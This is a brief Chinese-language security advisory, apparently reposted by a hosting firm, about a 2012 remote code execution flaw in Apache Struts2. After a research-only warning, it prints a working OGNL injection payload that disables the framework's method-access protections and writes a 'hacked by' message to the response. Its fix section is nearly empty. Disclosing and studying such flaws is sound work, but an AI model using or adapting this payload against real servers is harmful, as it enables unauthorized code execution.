Apache Struts2 Skill名称远程代码执行漏洞 |
发布时间: 2012/9/8 16:12:59 |
发布日期:2012-08-23 受影响系统: - Apache Struts是一款开发Java Web应用程序的开源Web应用框架。 Apache Struts在实现上存在安全漏洞,攻击者可利用此漏洞在网络服务器进程中运行上传的脚本代码,导致非法访问或权限提升。 <*来源:kxlzx 测试方法: 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! kxlzx ()提供了如下测试方法: %{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())} 建议: Apache Group
本文出自:亿恩科技【www.enkj.com】 |